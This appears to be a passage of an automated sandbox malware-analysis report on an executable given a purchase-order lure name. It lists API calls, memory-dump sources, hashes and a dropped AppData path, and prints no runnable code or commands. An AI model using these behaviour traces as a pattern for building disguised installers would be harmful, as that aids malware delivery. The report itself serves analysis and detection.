                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(7433505C,00000004,00000040,7433504C), ref: 74332A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 7404dfc60d49540e4e7c5eebcda1059c03bf962560e307ebb2991d5903e06c15
                                                  • Instruction ID: 3cd3c3394b7167e07c56e611c27d2b4b0e7f40b1d1eb229941795dc2a3c56ada
                                                  • Opcode Fuzzy Hash: 7404dfc60d49540e4e7c5eebcda1059c03bf962560e307ebb2991d5903e06c15
                                                  • Instruction Fuzzy Hash: ECF0A5F2769280DEC350CF2A84847A93FE8F71C315F66492BE18CD6241E3364188CF91
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040659D,?,00421F28,?,?,Call,?,00000000), ref: 00406533
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 5336109075fc53c24936953caa465b8c284d602aedfe9fd7dab949f6f964baca
                                                  • Instruction ID: 1b717f002b1b5d42ac4a363b0c989c392d1cd2f92e3df3bac2afb992ac9c93ae
                                                  • Opcode Fuzzy Hash: 5336109075fc53c24936953caa465b8c284d602aedfe9fd7dab949f6f964baca
                                                  • Instruction Fuzzy Hash: 2BD05E73A146008BD754EBB8BE8549F73A8EA50319320483BD102E1091E6788902861C
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                  • GetClientRect.USER32(?,?), ref: 00405910
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                  • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                  • ShowWindow.USER32(00000000), ref: 00405A5F
                                                  • ShowWindow.USER32(00000000,00000008), ref: 00405A64
                                                  • ShowWindow.USER32(00000008), ref: 00405AAE
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                  • CreatePopupMenu.USER32 ref: 00405AF3
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                  • GetWindowRect.USER32(?,?), ref: 00405B27
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                  • OpenClipboard.USER32(00000000), ref: 00405B88
                                                  • EmptyClipboard.USER32 ref: 00405B8E
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                  • CloseClipboard.USER32 ref: 00405BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H/B${
                                                  • API String ID: 590372296-332483393
                                                  • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction ID: 26959a90f0a266772171a70e0d2c3eddd0d3dcd8a9821819e75e01dae6d4cf8f
                                                  • Opcode Fuzzy Hash: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
                                                  • Instruction Fuzzy Hash: 1EB158B0900608FFEB11AF60DD859AE7B79FB08354F00413AFA45BA1A0CB785E51DF68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                  • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C79
                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404C85
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                    • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00000400,00404CCE), ref: 00405CF9
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                    • Part of subcall function 00406950: CharNextW.USER32(?,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                    • Part of subcall function 00406950: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,00403640,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D5A
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                    • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                    • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                    • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F8B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call$H/B$]X
                                                  • API String ID: 2624150263-1427019131
                                                  • Opcode ID: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction ID: d1d33be9ed2b3c34a6912e34267e60509d8c64d33f654f2361a06684bbdb7283
                                                  • Opcode Fuzzy Hash: 5391f58817f8cb56906519b00545e03f0092e071ef6120135fd40e88676cc4e1
                                                  • Instruction Fuzzy Hash: FBA191B1900209ABDB11AFA5CD41AEFB7B8FF84754F11843BF601B62D1DB7C89418B69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                  • Instruction ID: 5eb670257f645768a78f75f5229fdd379fa6a203c359b676d04f77a704ba2a21
                                                  • Opcode Fuzzy Hash: 00a330d8d8c13441593921db70a8cb17a676f2e75f0fcbbed06ef6cfd4e26c9a
                                                  • Instruction Fuzzy Hash: 9DF08271A04105AADB00EBA5D9499AEB378EF14314F60017BE111F31E5D7B88E51DB29
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                  • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                  • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                  • DeleteObject.GDI32(00000000), ref: 00405188
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                  • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                  • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                  • GlobalFree.KERNEL32(?), ref: 004054C8
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                  • ShowWindow.USER32(?,00000000), ref: 00405672
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                  • ShowWindow.USER32(00000000), ref: 00405684
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N$]X
                                                  • API String ID: 2564846305-972277047
                                                  • Opcode ID: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction ID: 34ca0daebb1283ae0dea41fcbe79f03df20d3d5ccd25e7298a94edbde83860af
                                                  • Opcode Fuzzy Hash: 5556c4ccadcc43b485929ea75668a96a24f705d46e3e8325ca371777a04c903b
                                                  • Instruction Fuzzy Hash: F5028C70A00609AFDB20DF55CD45AAF7BB5FB84314F50857AF910BA2E1D7B98A42CF18
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                  • ShowWindow.USER32(?), ref: 0040417E
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                  • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                  • DestroyWindow.USER32 ref: 004041BD
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                  • GetDlgItem.USER32(?,?), ref: 004041F5
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                  • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                  • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                  • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                  • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                  • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                  • EnableWindow.USER32(?,?), ref: 00404409
                                                  • EnableWindow.USER32(?,?), ref: 00404424
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                  • EnableMenuItem.USER32(00000000), ref: 00404441
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                  • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404496
                                                  • SetWindowTextW.USER32(?,00422F48), ref: 004044AA
                                                  • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: H/B
                                                  • API String ID: 1860320154-184950203
                                                  • Opcode ID: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction ID: 9a8659dd655c0040c26f3da6c71aaed3cdb3e7512c47e66a19b3526095f1ef41
                                                  • Opcode Fuzzy Hash: 1d334063ac87d117f163498afb3e0779bdc14ef4bf1212a9a53b176d670ff06c
                                                  • Instruction Fuzzy Hash: 0FC1CEB1600604BBDB216F61EE85E2B7A68FB85345F41093EF741B25F0CB799842DB2D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                  • GetSysColor.USER32(?), ref: 004048C0
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                  • lstrlenW.KERNEL32(?), ref: 004048E1
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040495C
